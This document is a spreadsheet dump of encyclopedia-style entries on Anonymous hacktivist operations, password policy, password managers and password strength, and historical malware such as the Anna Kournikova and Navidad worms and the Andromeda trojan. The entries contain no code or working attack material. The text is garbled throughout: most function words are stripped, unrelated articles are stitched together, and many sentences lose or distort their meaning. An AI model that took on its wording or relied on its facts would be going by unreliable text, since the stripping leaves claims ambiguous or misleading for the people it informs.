responsibility denial service attack canadian government websites protest passage bill c-51—an anti-terror legislation grants additional powers canadian intelligence agencies. attack temporarily affected websites several federal agencies. october 2015, anonymous announced would reveal names 1,000 members klux klan affiliated groups, stating press release, "you terrorists hide identities beneath sheets infiltrate society every level. privacy klux klan longer exists cyberspace." november list phone numbers email addresses (that allegedly belong members) reportedly published received media attention. however, tweet "@operation_kkk" twitter account denied released information group stated planned later did, reveal names november 5.since 2013, saudi arabian hacktivists targeting government websites protesting actions regime. these actions seen attacks supported possibly iranian backed yemen cyber army. offshoot anonymous self-described ghost security ghostsec started targeting islamic state-affiliated websites social media handles.in november 2015, anonymous announced major, sustained operation isis following november 2015 paris attacks, declaring: "anonymous world hunt down. know find go." isis responded telegram calling "idiots", asking "what gonna [sic] hack?" next day, however, anonymous claimed taken 3,824 pro-isis twitter accounts, third 5,000, doxxed isis recruiters. week later, anonymous increased claim 20,000 pro-isis accounts released list accounts. list included twitter accounts barack obama, hillary clinton, york times, news. reported accounts list appeared still active. spokesman twitter told daily company using lists accounts reported anonymous, found "wildly inaccurate" include accounts used academics journalists.in 2015, group claimed affiliated anonymous, calling anonsec, claimed hacked gathered almost data nasa servers including nasa flight radar logs videos, also multiple documents related ongoing research. anonsec group also claimed gaining access global hawk drone nasa, released video footage purportedly drone's cameras. part data released anonsec pastebin service, anon zine. nasa denied hack, asserting control drones never compromised, acknowledged photos released along content real photographs employees, data already available public domain. 2016 blink hacker group, associating anonymous group, claimed hacked thailand prison websites servers. compromised data shared online, group claiming give data back thailand justice citizens thailand well. hack done response news thailand mistreatment prisoners thailand.in late 2017, qanon conspiracy theory first emerged 4chan, adherents used similar terminology branding anonymous. response, anti-trump members anonymous warned qanon stealing collective's branding vowed oppose theory.a group calling anonymous africa launched number ddos attacks websites associated controversial south african gupta family mid-june 2016. gupta-owned companies targeted included websites oakbay investments, age, ann7. websites south african broadcasting corporation political parties economic freedom fighters zimbabwe's zanu-pf also attacked "nationalist socialist rhetoric politicising racism." 2020 february 2020, anonymous hacked united nations' website created page taiwan, country seat since 1971. hacked page featured flag taiwan, emblem, taiwan independence flag, anonymous logo along caption. hacked server belonged united nations department economic social affairs.in wake protests across following murder george floyd, anonymous released video facebook well sending minneapolis police department 2020, titled "anonymous message minneapolis police department", state going seek revenge minneapolis police department, "expose crimes world". according bloomberg, video initially posted unconfirmed anonymous facebook page according news, facebook page notoriety published videos dubious content linked ufos "china's plan take world". gained repercussions video george floyd published minneapolis police website, responsible police officer, down. later, minnesota governor walz said every computer region suffered sophisticated attack. according news, attack police website using ddos (distributed denial service) unsophisticated. according researcher troy hunt, breaches site happened credentials. regarding unverified twitter posts also went viral, radio stations police officers playing music preventing communication shown, experts point unlikely hack attack real. later, confirmed cnet leaks made police website false someone taking advantage repercussions george floyd's murder spread misinformation.on june 2020, anonymous published blueleaks, sometimes referred twitter hashtag #blueleaks, 269.21 gibibytes internal u.s. enforcement data activist group distributed denial secrets, called "largest published hack american enforcement agencies". data internal intelligence, bulletins, emails, reports produced august 1996 june 2020 enforcement agencies, provided fusion centers. obtained security breach netsential, developer works fusion centers enforcement. during george floyd protests, enforcement agencies monitored protesters' communications social media messaging apps. reports leaked found police aware potential surveillance violate constitution. they distributed documents police filled rumors warnings protests would become violent, sparking fear among police officers.the documents also show much broader trend surveillance. they show details data police obtain social media sites including facebook, twitter, tiktok, reddit tumblr, among others. fusion centers also collect distribute detailed data automatic license plate readers. surveys enforcement training programs reveal instructors prejudiced unprofessional. classes taught biased, outdated, incorrect content. some contain sexual content unrelated class, report instructor admitting lying court frequently.in maine, legislators took interest blueleaks thanks details maine information analysis center, investigation. leaks showed fusion center spying keeping records people legally protesting "suspicious" committed crime. documents also contain reports countries department homeland security, u.s. department state agencies. officials discussed cyber attacks iran concerns attacks early 2020. another report discusses possible chinese espionage natural facilities. homeland security also discussed russian interference american elections, attempts hack 2020 census, manipulation social media discussion.in 2020, anonymous started cyber-attacks nigerian government. they started operation support #endsars movement nigeria. group's attacks tweeted member anonymous called litemods. websites efcc, inec various nigerian government websites taken-down ddos attacks. websites banks compromised. 2021 texas heartbeat act, bans abortions weeks pregnancy, came effect texas september 2021. relies private citizens file civil lawsuits anyone performs induces abortion, aids abets one, "cardiac activity" embryo detected transvaginal ultrasound, usually possible beginning around weeks pregnancy. shortly came effect, anti-abortion organizations websites collect "whistleblower" reports suspected violators bill.on september anonymous announced "operation jane", campaign focused stymying attempted enforce "exhaust[ing] investigational resources bounty hunters, snitch sites, online gathering spaces able maintain data integrity". september group hacked website republican party texas, replacing text anonymous, invitation join operation jane, planned parenthood donation link.on september anonymous released large quantity private data belonging epik, domain registrar hosting company known providing services websites host far-right, neo-nazi, extremist content. epik briefly provided services abortion "whistleblower" website anti-abortion texas right life organization, reporting form went offline september epik told group violated terms service collecting private information third parties. data included domain purchase transfer details, account credentials logins, payment history, employee emails, unidentified private keys. hackers claimed obtained decade's worth data" included customers domains ever hosted registered company, included poorly encrypted passwords sensitive data stored plaintext. later september distributed denial secrets (ddosecrets) organization said working curate allegedly leaked data accessible download, said consisted "180 gigabytes user, registration, forwarding information". publications including daily record recorded future subsequently confirmed veracity hack types data exposed. anonymous released another leak september time publishing bootable disk images epik's servers; disk images well leaked documents republican party texas appeared october 2022 february 2022, twitter accounts associated anonymous declared launched 'cyber operations' russian federation, retaliation invasion ukraine ordered russian president vladimir putin. group later temporarily disabled websites rt.com website defence ministry along state owned websites. anonymous also leaked worth emails belarusian weapons manufacturer tetraedr, provided logistical support russia russian invasion ukraine. anonymous also hacked russian channels played ukrainian music showed uncensored news events ukraine. operation russia this section expanded page anonymous 2022 russian invasion ukraine. read operation there. march 2022, anonymous actors depaixporteur thewarriorpoetz declared twitter hacked russian surveillance cameras broadcast website. they call operation "russian camera dump".on march 2022, ddosecrets published approximately 22.5 gigabytes emails allegedly central bank russia, allegedly hacked anonymous actor thblckrbbtworld. included package registrations, invoices, internal communications, documents, notes, bank statements, names shareholders various banks, bank licenses, names, addresses clients, apparently high-profile clients, etc. march 2022, ddosecrets published gigabytes emails rostproekt, hacked anonymous actor depaixporteur. rostproekt russian construction company. rostproekt hack dubbed "celebration" grand opening now-defunct anonymousleaks, leak site solely leaks anonymous collective.on april 2022, ddosecrets published approximately 200,000 emails capital legal services, hacked anonymous actor wh1t3sh4d0w. approximately 200,000 emails hacked russian firm capital legal services, practices variety areas. additional 89,000 emails located "purges" mailbox, consisting largely bounced email notifications, cron jobs server notifications. april 2022, ddosecrets published 900,000 emails all-russia state television radio broadcasting company (vgtrk), hacked anonymous aligned nb65. vgtrk russian state-owned broadcaster operates five national stations, international networks, five radio stations, regional radio networks. russian government declared vgtrk essential "security state." vgtrk also runs information agency rossiya segodnya росси́я сего́дня, operates sputnik, novosti entities. april 2022, ddosecrets published approximately 100,000 emails aerogas, hacked anonymous. approximately 100,000 emails aerogas, engineering company specializes industry. aerogas' clients include rosneft, novatek, volgagaz, purneft others. april 2022, ddosecrets published approximately 230,000 emails blagoveshchensk city administration, hacked anonymous. 230,000 emails blagoveshchensk city administration благове́щенск 2019 2022. april 2022, ddosecrets published roughly gigabytes emails continent express, russian travel agency, hacked anonymous aligned nb65.on april 2022, ddosecrets published gigabytes emails, files decryption keys gazregion, hacked three different sources around time, including anonymous actor depaixporteur, anonymous affiliated nb65, unnamed actor. construction company specializing pipelines facilities. gazregion's clients include gazprom, thousands kilometers pipelines part russian federation's program transport throughout different regions. april 2022, ddosecrets published 15,600 emails guov general dept. troops civil construction, hacked anonymous actor depaixporteur. construction company works projects interests russian ministry defense. guov wholly owned russian ministry defense garnizon (formerly oboronservis) guov г</t>
  </si>
  <si>
    <t>Anontune</t>
  </si>
  <si>
    <t>anontune proposal "fault-tolerant open platform social music" anonymous. beta implementation allowed users create playlists song titles playable anontune's music engine. since music engine worked searching networks like youtube playlists could shared without sharing actual music. thus anontune's music engine like client-side metasearch engine previous systems. anonymous hoped would make platform immune copyright infringement lawsuits never directly hosting linking copyrighted music allowing downloaded. aims white paper titled fault-tolerant open platform social music (version anonymous outlined aims anontune project: allow open access platform information developers, researchers, users, artists, labels. provide legal indemnity anonymity prosecution users. create music engine flexible, dynamic, redundant, fault-tolerant organization music networks. improve musical listening experiences. create social environment model sharing discovering music. support contribute experimentation innovation around music. allow artists, labels, associated parties earn money content.the concept openness pervading theme anontune. source code anontune open source agpl license, restrictions developer usage, platform open anyone, music open. anonymous viewed difference music services stating [such services] employ geographic restrictions provide partial music catalogs. stance piracy video posted website stated anontune would never host encourage downloading copyrighted music would instead provide information music. video stated paradigm music sharing, would allow music exists internet played single platform. video also stated anontune itself, distinguished copyright questions music, would legal. users service would able remain largely anonymous. technology anontune's music engine worked consulting multiple components called "routes." each route described search, filter, play, optionally download music specific place internet. route youtube would allow results youtube played browser. music engine designed flexible possible finished version allow users extend adding arbitrary routes thereby increasing music access to.because limitations anonymous claim develop technology allowing sockets used music engine. this technology would required contributors java applet. such technology development, said already functional.news reports warned potential users would need trust anonymous service, website would require java applet full permissions. anonymous responded pastebin post java applet longer used, java used would open source, strictly required, would interests harm users.a prototype went online early hours april 2012. legal issues anonymous stated side creation anontune, object anontune break copyright industry's monopoly without fighting court. anonymous said learned experiences previous entities napster limewire. anontune attempted avoid legal problems never hosting links copyrighted content. users would able avoid lawsuits well, since media played browser rather downloaded user's hard drive. since anontune merely allowed users centralize experience music sources, legal complaints would addressed original sources content youtube. closure anontune closed january 2014. anontune.com domain forwards posting pastebin states "the executive decision pull plug" project made. anonymous poster wrote that, "the anontune released nothing like envisioned project. users deserve we've achieved—which ugly, incomplete application largely unproven ideas." also file sharing privacy file sharing networks trade group efforts file sharing open music model references external links official site</t>
  </si>
  <si>
    <t>AnonCoders</t>
  </si>
  <si>
    <t>anoncoders group computer hackers. using denial service attacks, database hijacking, database leaks, admin panel takeovers, defacements, group mainly targets israeli websites protest crimes allegedly committed palestinian people behalf israel. anoncoders began operation january 2015. anoncoders first attack leveled several major israeli websites. february, attacked numerous french websites opposition cartoons islamic prophet muhammad published charlie hebdo magazine. group vandalized sites israel, europe, united states. references</t>
  </si>
  <si>
    <t>Password policy</t>
  </si>
  <si>
    <t>password policy rules designed enhance computer security encouraging users employ strong passwords properly. password policy often part organization's official regulations taught part security awareness training. either password policy merely advisory, computer systems force users comply some governments national authentication frameworks define requirements user authentication government services, including requirements passwords. nist guidelines united states department commerce's national institute standards technology (nist) standards password policies widely followed. 2004 from 2004, “nist special publication 800-63. appendix advised people irregular capitalization, special characters, least numeral. this advice systems followed, "baked into" number standards businesses needed follow. 2017 however, 2017 major update changed advice, particularly forcing complexity regular changes seen practice.: 5.1.1.2 points are: verifiers impose composition rules e.g., requiring mixtures different character types prohibiting consecutively repeated characters verifiers require passwords changed arbitrarily regularly e.g. previous rule passwords must least characters length password systems permit subscriber-chosen passwords least characters length. printing ascii characters, space character, unicode characters acceptable passwords when establishing changing passwords, verifier shall advise subscriber need select different password chosen weak compromised password verifiers offer guidance password-strength meter, assist user choosing strong password verifiers shall store passwords form resistant offline attacks. passwords shall salted hashed using suitable one-way derivation function. derivation functions take password, salt, cost factor inputs generate password hash. their purpose make password guessing trial attacker obtained password hash file expensive therefore cost guessing attack high prohibitive.nist included rationale guidelines appendix aspects typical components password policy include: password length formation many policies require minimum password length. eight characters typical appropriate. longer passwords generally secure, systems impose maximum length compatibility legacy systems. some policies suggest impose requirements type password user choose, upper-case lower-case letters (case sensitivity) inclusion numerical digits inclusion special characters, prohibition words found password blocklist prohibition words found user's personal information prohibition company name abbreviation prohibition passwords match format calendar dates, license plate numbers, telephone numbers, common numbersother systems create initial password user; require change choosing within short interval. password block list password block lists lists passwords always blocked use. block lists contain passwords constructed character combinations otherwise meet company policy, longer used deemed insecure reasons, easily guessed, following common pattern, public disclosure previous data breaches. common examples password1, qwerty123, qaz123wsx. password duration some policies require users change passwords periodically, often every days. benefit password expiration, however, debatable. systems implement policies sometimes prevent users picking password close previous selection.this policy often backfire. some users find hard devise "good" passwords also easy remember, people required choose many passwords change often, using much weaker passwords; policy also encourages users write passwords down. also, policy prevents user repeating recent password, requires database existence everyone's recent passwords hashes) instead ones erased memory. finally, users change password repeatedly within minutes, change back really want use, circumventing password change policy altogether. human aspects passwords must also considered. unlike computers, human users cannot delete memory replace another. consequently, frequently changing memorized password strain human memory, users resort choosing password relatively easy guess (see password fatigue). users often advised mnemonic devices remember complex passwords. however, password must repeatedly changed, mnemonics useless user would remember mnemonic use. furthermore, mnemonics (leading passwords "2bornot2b") makes password easier guess. administration factors also issue. users sometimes older devices require password used password duration expired. order manage older devices, users resort writing passwords case need older device. requiring strong password requiring changed often better. however, approach major drawback: unauthorized person acquires password uses without detected, person access indefinite period. necessary weigh factors: likelihood someone guessing password weak, versus likelihood someone managing steal, otherwise acquire without guessing, stronger password. bruce schneier argues "pretty much anything remembered cracked", recommends scheme uses passwords appear dictionaries. sanction password policies include progressive sanctions beginning warnings ending possible loss computer privileges termination. where confidentiality mandated law, e.g. classified information, violation password policy could criminal offense. some consider convincing explanation importance security effective threats sanctions. selection process level password strength required depends, among things, easy attacker submit multiple guesses. some systems limit number times user enter incorrect password delay imposed account frozen. extreme, systems make available specially hashed version password, anyone check validity. when done, attacker passwords rapidly; much stronger passwords necessary reasonable security. (see password cracking password length equation.) stricter requirements also appropriate accounts higher privileges, root system administrator accounts. usability considerations password policies usually tradeoff theoretical security practicalities human behavior. example: requiring excessively complex passwords forcing changed frequently cause users write passwords places easy intruder find, rolodex post-it note near computer. users often dozens passwords manage. realistic recommend single password used security applications, reading on-line newspapers accessing entertainment sites. similarly, demanding users never write passwords unrealistic lead users choose weak ones cause inconvenience users forget password). alternative suggest keeping written passwords secure place, safe encrypted master file. validity approach depends likely threat deemed while writing password problematic potential attackers access secure store, threat primarily remote attackers access store, secure method. inclusion special characters problem user onto computer different country. some special characters difficult impossible find keyboards designed another language. some identity management systems allow self-service password reset, users bypass password security supplying answer security questions "where born?", "what's favorite movie?", etc. often answers questions easily obtained social engineering, phishing simple research.a 2010 examination password policies different websites concludes security partly explains stringent policies: monopoly providers service, government sites, stringent policies sites consumers choice (e.g. retail sites banks). study concludes sites stringent policies greater security concerns, simply better insulated consequences poor usability." other approaches available generally considered secure simple passwords. these include security token one-time password system, s/key, multi-factor authentication. however, systems heighten tradeoff security convenience: according shuman ghosemajumder, systems improve security, come cost moving burden user." enforcing policy complex password policy, harder enforce, user difficulty remembering choosing suitable password. most companies require users familiarize password policy, much company would require employees aware health safety regulations, building fire exits, however often difficult ensure relevant policies actually followed without systems place automatically enforce policy. many systems, microsoft windows, require passwords built-in methods enforcing policy. this reliable ensure policy followed. also random password generator secure error messages software systems single sign-on references</t>
  </si>
  <si>
    <t>Anna Kournikova (computer virus)</t>
  </si>
  <si>
    <t>anna kournikova (named vbs.onthefly author, also known vbs/sst vbs_kalamar) computer virus spread worldwide internet february 2001. virus program contained email attachment, purportedly image tennis player anna kournikova. background virus created 20-year-old dutch student wit, used pseudonym "onthefly", february 2001. designed trick email users clicking open email attachment ostensibly appearing image professional tennis player anna kournikova, instead hiding malicious program. virus arrived email subject line "here have, ;0)" attached file entitled annakournikova.jpg.vbs. when opened microsoft outlook, file display picture kournikova, launched viral vbscript program forwarded contacts victim's address book.de created anna kournikova matter hours using simple online visual basic worm generator program written argentinian programmer called [k]alamar. "the young downloaded program sunday, february internet later day, around 3:00 p.m., virus loose newsgroup." anna kournikova virus corrupt data infected computer, unlike similar iloveyou virus struck year earlier 2000, infected computers millions users caused problems email servers worldwide. conviction david smith (the author 1999 melissa virus, custody time), assisted tracking wit's identity. turned police hometown sneek february 2001, posted confession website newsgroup devoted tennis player (alt.binaries.anna-kournikova), dated february. admitted creation virus using toolkit, said motivations whether community developed better system security aftermath previous virus infections. also attributed blame virus's rate spreading kournikova's beauty, blamed opened email, writing: "it's fault infected."a days virus release, mayor sneek, sieboldt hartkamp, made tentative offer local administration's department, saying city proud produced talented young man.de tried leeuwarden charged spreading data computer network intention causing damage, crime carried maximum sentence four years prison fine 100,000 guilders (then equivalent us$41,300). lawyers called dismissal charges him, arguing virus caused minimal damage. submitted evidence dutch court, suggesting us$166,000 damages caused virus. denying intent cause damage, sentenced hours community service.the 18-year-old buenos aires programmer created worm generator toolkit removed application's files website later february 2001. interview, said friends encouraged hearing pseudonym television. also comparison computer viruses list convicted computer criminals timeline notable computer viruses worms references</t>
  </si>
  <si>
    <t>Password notification email</t>
  </si>
  <si>
    <t>password notification email common password recovery technique used websites. user forgets password password notification email sent containing enough information user access account again. this method password retrieval relies assumption legitimate owner account access inbox particular email address. process often initiated user clicking forgotten password link website where, entering username email address, password notification email would automatically sent inbox account holder. this email contain temporary password followed enter password account. password often contain randomly generated string text obtained reading particular email.another method used send part original password email. sending characters password, help user remember original password, without reveal whole password them. security concerns main issue contents password notification email easily discovered anyone access inbox account owner. this could result shoulder surfing inbox password protected. contents could used compromise security account. user would therefore responsibility either securely deleting email ensuring contents revealed anyone else. partial solution problem, cause links contained within email expire period time, making email useless used quickly sent. method sends part original password means password stored plain text leaves password open attack hackers. this typical newer sites create password generate token. site gets hacked password contained within could used access accounts used user, user chosen password accounts. additionally emails often secure unless email encrypted prior sent, contents could read anyone eavesdrops email. references</t>
  </si>
  <si>
    <t>Password manager</t>
  </si>
  <si>
    <t>password manager computer program allows users store, generate, manage passwords local applications online services. password manager assists generating retrieving complex passwords, storing passwords encrypted database, calculating demand.types password managers include: locally installed software applications online services accessed website portals locally accessed hardware devices serve keysdepending type password manager used functionality offered developers, encrypted database either stored locally user's device stored remotely online file-hosting service. password managers typically require user generate remember "master" password unlock access information stored databases. many password manager applications offer additional capabilities enhance convenience security storage credit card frequent flyer information autofill functionality. locally installed software password managers commonly reside user's personal computer mobile device, form locally installed software application. these applications offline, wherein password database stored independently locally device password manager software. alternatively, password managers offer require cloud-based approach, wherein password database dependent online file hosting service stored remotely, handled password management software installed user's device.some offline password managers require internet permission, leakage data network. extent, fully offline password manager secure, much weaker convenience functionality online one. web-based services online password manager website securely stores login details. they web-based version conventional desktop-based password manager. advantages online password managers desktop-based versions portability (they generally used computer browser network connection, without install software), reduced risk losing passwords theft damage single although risk present server used store users passwords cases risk prevented ensuring secure backups taken.the major disadvantages online password managers requirements user trusts hosting site keylogger computer using. with servers cloud focus cyber attacks, authenticates online service whether passwords stored encrypted user defined important. another important factor whether one- two-way encryption used.some online password management systems, bitwarden, open source, source code independently audited, hosted user's machine, rather relying service's cloud.the web-based password manager alternative single sign-on techniques, openid microsoft's microsoft account (previously microsoft wallet, microsoft passport, .net passport, microsoft passport network, windows live scheme, serve stop-gap measure pending adoption better method. token-based hardware devices token-based password managers need security token mechanism, wherein locally-accessible hardware device, smart cards secure flash devices, used authenticate user lieu addition traditional text-based password two-factor authentication system. data stored token usually encrypted prevent probing unauthorized reading data. some token systems still require software loaded along hardware (smart card reader) drivers properly read decode data. credentials protected using security token, thus typically offering multi-factor authentication combining something user mobile application generates rolling token similar virtual smart card, smart card stick, something user knows (pin password), and/or something user like biometrics fingerprint, hand, retina, face scanner.there companies make specific third-party authentication devices, popular yubikey. third-party password managers integrate hardware devices. while seem like problem, password managers acceptable two-step verification options, integrating apps like google authenticator in-built totp generators. while third-party token devices useful heightening security, considered extra measures security convenience, considered essential critical proper functioning password manager. advantages advantage password-based access controls easily incorporated software using apis available many software products, require extensive computer/server modifications, users already familiar passwords. while passwords fairly secure, weakness users choose manage them, using: simple passwords short length, words found dictionaries, different character types (numbers, punctuation, upper/lower case), otherwise easily guessable passwords others find sticky notes monitors, notepad computer, document computer, whiteboard reminders, smart device storage clear text, etc. password using password multiple sites, never changing account passwords, etc. shared passwords users telling others passwords, sending unencrypted emails password information, contractors using password accounts, etc. administrative account logins limited logins would suffice, administrators allow users role password.it typical make least mistakes. this makes easy hackers, crackers, malware cyber thieves break individual accounts, corporations sizes, government agencies, institutions, etc. protecting vulnerabilities makes password managers important.password managers also used defense phishing pharming. unlike human beings, password manager program also incorporate automated login script first compares current site's stored site's url. match password manager automatically fill login fields. this intended safeguard visual imitations look-alike websites. with built-in advantage, password manager beneficial even user passwords remember. while password managers automatically handle complex login procedures imposed many banking websites, many newer password managers handle complex passwords, multi-page fill-ins, multi-factor authentication prior.by logic, password managers also protect keystroke logging malware (keyloggers). when using multi-factor authentication password manager automatically fills logon fields, user type user names passwords keylogger pick while keylogger pick authenticate smart card token, example, without smart card (something user has) attacker good. however, password managers cannot protect man-in-the-browser attacks, malware user's device performs operations (e.g. banking website) user logged hiding malicious activity user. issues vulnerabilities passwords stored unencrypted fashion, still generally possible obtain passwords given local access machine. some password managers user-selected master password passphrase form used encrypt protected passwords. security approach depends strength chosen password (which might guessed brute-forced), also passphrase never stored locally malicious program individual could read compromised master password renders protected passwords vulnerable. system involves user entering password, master password also attacked discovered using logging acoustic cryptanalysis. some password managers attempt virtual keyboards reduce risk though still vulnerable loggers take screenshots data entered. this risk mitigated multi-factor verification device. some password managers include password generator. generated passwords guessable password manager uses weak random number generator instead cryptographically secure one. strong password manager include limited number false authentication entries allowed password manager locked requires services re-activate. this best protect brute-force attack. password managers prevent swapping memory hard drive make possible extract unencrypted passwords computer’s hard drive. turning swap prevent risk. web-based password managers, inside browser user, particularly fraught pitfalls. detailed study using several password managers uncovered following possible flaws inside web-based password managers: authorization flaws: another possible problem mistaking authentication authorization. researcherwho? neededfound several web-based password managers had, point time, flaws. these issues particular present password managers allowed users share credentials users. bookmarklet flaws: web-based password managers commonly rely bookmarklets signing users. however, improperly implemented, malicious website abuse steal user's password. main cause vulnerabilities javascript environment malicious website cannot trusted. user interface flaws: some password managers user iframe. this present security risk trains user fill password displayed browser password manager. phisher abuse creating fake iframe capturing user's credentials. secure approach open users login password manager. flaws: classic vulnerabilities also present web-based password managers. particular, csrf vulnerabilities exploited hackers obtain user's password.furthermore, password managers disadvantage potential hacker malware need know password gain access user's passwords managers standardized locations ways storing passwords exploited malware. blocking password managers various high-profile websites attempted block password managers, often backing publicly challenged. reasons cited included protecting automated attacks, protecting phishing, blocking malware, simply denying compatibility. trusteer client security software features explicit options block password managers.such blocking criticized information security professionals making users less secure. typical blocking implementation involves setting autocomplete='off' relevant password form. consequently, option ignored internet explorer https sites, firefox chrome safari 7.0.2.a 2014 paper researcher carnegie mellon university found whilst browsers refuse autofill protocol current login page different protocol time password saved, password managers would insecurely fill passwords http version https-saved passwords. most managers protect iframe redirection based attacks exposed additional passwords password synchronization used multiple devices. also list password managers password fatigue password management security token smart card cryptography references external links password manager curlie</t>
  </si>
  <si>
    <t>Password management</t>
  </si>
  <si>
    <t>there several forms software used help users organizations better manage passwords: intended single user: password manager software used individuals organize encrypt many personal passwords using single login. this often involves encryption well. password managers also referred password wallets. intended multiple users/groups users: password synchronization software used organizations arrange different passwords, different systems, value belong person. self-service password reset software enables users forgot password triggered intruder lockout authenticate using another mechanism resolve problem, without calling help desk. enterprise single signon software monitors applications launched user automatically populates login passwords. single signon software intercepts user access applications either inserts authentication information http(s) stream redirects user separate page, user authenticated directed back original url. privileged password management (used secure access shared, privileged accounts). privileged password management privileged password management type password management used secure passwords login elevated security privileges. this often done periodically changing every password new, random value. since users automated software processes need passwords function, privileged password management systems must also store passwords provide various mechanisms disclose passwords secure appropriate manner. privileged password management related privileged identity management. examples privileged passwords there three main types privileged passwords. they used authenticate: local administrator accounts unix linux systems, root user privileged login account. windows, equivalent administrator. databases, equivalent general, operating systems, databases, applications network devices include administrative login, used install software, configure system, manage users, apply patches, etc. systems, different privileged functions assigned different users, means privileged login accounts, less powerful. service accounts windows operating system, service programs execute context either system (very privileged password) user account. when services non-system user, service control manager must provide login password service program service accounts passwords. unix linux systems, init inetd launch service programs non-privileged users without knowing passwords services normally passwords. connections application another often, application needs able connect another, access service. common example pattern application must database retrieve information. these inter-application connections normally require login password password. securing privileged passwords privileged password management system secures privileged passwords periodically changing password random value. storing values. protecting stored values (e.g., using encryption replicated storage). providing mechanisms disclose passwords various types participants system: administrators. programs launch services (e.g., service control manager windows). applications must connect applications. required infrastructure privileged password management system requires extensive infrastructure: mechanism schedule password changes. connectors various kinds systems. mechanism update various participants password values. extensive auditing. encrypted storage. authentication parties wish retrieve password values. access controls authorization decide whether password disclosure appropriate. replicated storage ensure hardware failure site disaster lead loss data. also password manager list password managers password fatigue security token smart card</t>
  </si>
  <si>
    <t>Andy Greenberg</t>
  </si>
  <si>
    <t>andy greenberg technology journalist serving senior writer wired magazine. previously worked staff writer forbes magazine contributor forbes.com. published books this machine kills secrets concerning whistleblowing well sandworm, concerning eponymous hacking group. writing greenberg's july 2015 article charlie miller chris valasek's jeep hack resulted recall million vehicles chrysler. article's publication, bill introduced u.s. senate seeking standards protect cars digital hacks.greenberg's 2012 book this machine kills secrets york times editors' choice. featured 2015 documentary film deep web, trial ross ulbricht.in 2014, greenberg nominated along ryan gerald loeb award forbes magazine article, "big brother's brain". year, named sans institute's cybersecurity journalist award winners. 2013, forbes.com story "meet hackers sell spies tools crack your (and paid six-figure fees)" "the single best blog post year" award security bloggers network.he received 2019 gerald loeb award international reporting article "the code crashed world: untold story notpetya, most devastating cyberattack history".in 2019 book sandworm describes digital detectives unraveled "olympic destroyer" malware traced could attribute russia's military intelligence agency, gru. publications this machine kills secrets: julian assange, cypherpunks, fight empower whistleblowers. london: penguin group, 2012. isbn 978-0142180495. sandworm: cyberwar hunt kremlin's dangerous hackers. york city: knopf doubleday, 2019. isbn 978-0-385-54441-2. tracers dark: global hunt crime lords cryptocurrency. doubleday, anticipated november 2022. also computer worm references</t>
  </si>
  <si>
    <t>Andromeda (trojan)</t>
  </si>
  <si>
    <t>andromeda modular trojan first spotted 2011. behavior malware capability checking whether executed debugged virtual environment using anti-virtual machine techniques. downloads malware control servers, often order steal information infected computers. affected countries india (24%), vietnam (12%) iran (7%). andromeda heavily linked phishing campaigns, spam email attachments, illegal software downloads various exploit kits means distribution. research malware design revealed contains many similarities source code zbot/zeus. references</t>
  </si>
  <si>
    <t>Navidad virus</t>
  </si>
  <si>
    <t>w32.navidad mass-mailing worm program virus, discovered december 2000 windows windows windows windows 2000 systems. designed spread email clients microsoft outlook masquerading executable electronic christmas card. infected computers identified blue icons appear windows system tray. description when navidad.exe email attachment files installs "winsvrc.vxd" \windows\system directory. worm modifies default file startup windows registry, [hkey_classes_root\exefile\shell\open\command], allow program time file run. worm also creates startup ensure runs startup. navidad virus installs registry keys "winsvrc.exe" even though worm installed .vxd file extension, result worm prevents .exe files running startup. error "windows cannot find winsvrc.exe" displayed instead.during installation fake error message displayed. after user closes message identifiable blue icon appears system tray. users click icon presented dialog displays text "nunca presionar este boton" button. when clicked variety different messages, including states: "emmanuel-god us!may bless u.and ash, lj!!" "lamentablemente cayo tentacion perdio computadora" displayed depending version virus. when worm activated uses mapi32.dll library connect microsoft outlook exchange email send email addresses unread emails user inbox. this send worm every address sends user email removed system. navidad.b variant because original navidad virus would fail patched variant virus became popular, able spread email effectively original virus. cases, navidad.b would spread "emanuel.exe" install "wintask.exe" windows system directory make appear like native windows file. patched version virus fixed issue prevented files running, instead allowing files well running worm time initially intended. impact worm destroy data seriously damage infected computers, damage limited preventing files running bugged version worm. this virus also spread fast similar email worms melissa iloveyou caused limited disruptions email services. known outages attributed navidad virus. antivirus researcher mcafee, vincent gullotto, reported least fortune companies infected worm, although declined specify companies impacted worm. references</t>
  </si>
  <si>
    <t>Password strength</t>
  </si>
  <si>
    <t>password strength measure effectiveness password guessing brute-force attacks. usual form, estimates many trials attacker direct access password would need, average, guess correctly. strength password function length, complexity, unpredictability.using strong passwords lowers overall risk security breach, strong passwords replace need effective security controls. effectiveness password given strength strongly determined design implementation factors (knowledge, ownership, inherence). first factor main focus article. rate attacker submit guessed passwords system factor determining system security. some systems impose time-out several seconds small number (e.g. three) failed password entry attempts. absence vulnerabilities, systems effectively secured relatively simple passwords. however, system must store information user's passwords form information stolen, breaching system security, user's passwords risk. 2019, united kingdom's ncsc analysed public databases breached accounts words, phrases strings people used. popular password list 123456, appearing million passwords. second-most popular string, 123456789, much harder crack, five included "qwerty", "password" 1111111. password creation passwords created either automatically (using randomizing equipment) human; latter case common. while strength randomly chosen passwords brute-force attack calculated precision, determining strength human-generated passwords difficult. typically, humans asked choose password, sometimes guided suggestions restricted rules, creating account computer system internet website. only rough estimates strength possible since humans tend follow patterns tasks, patterns usually assist attacker. addition, lists commonly chosen passwords widely available password guessing programs. such lists include numerous online dictionaries various human languages, breached databases plaintext, hashed passwords various online business social accounts, along common passwords. items lists considered weak, passwords simple modifications them. although random password generation programs available nowadays meant easy use, usually generate random, hard remember passwords, often resulting people preferring choose own. however, inherently insecure person's lifestyles, entertainment preferences, individualistic qualities usually come play influence choice password, prevalence online social media made obtaining information people much easier. password guess validation systems passwords authentication must check password entered gain access. valid passwords simply stored system file database, attacker gains sufficient access system obtain user passwords, giving attacker access accounts attacked system possibly systems users employ similar passwords. reduce risk store cryptographic hash password instead password itself. standard cryptographic hashes, secure hash algorithm (sha) series, hard reverse, attacker gets hold hash value cannot directly recover password. however, knowledge hash value lets attacker quickly test guesses offline. password cracking programs widely available test large number trial passwords purloined cryptographic hash. improvements computing technology keep increasing rate guessed passwords tested. example, 2010, georgia tech research institute developed method using gpgpu crack passwords much faster. elcomsoft invented usage common graphic cards quicker password recovery august 2007 soon filed corresponding patent 2011, commercial products available claimed ability test 112,000 passwords second standard desktop computer, using high-end graphics processor time. such device crack six-letter single-case password day. note work distributed many computers additional speedup proportional number available computers comparable gpus. special stretching hashes available take relatively long time compute, reducing rate guessing take place. although considered best practice stretching, many common systems not. another situation quick guessing possible password used form cryptographic key. cases, attacker quickly check guessed password successfully decodes encrypted data. example, commercial product claims test 103,000 passwords second.if password system stores hash password, attacker 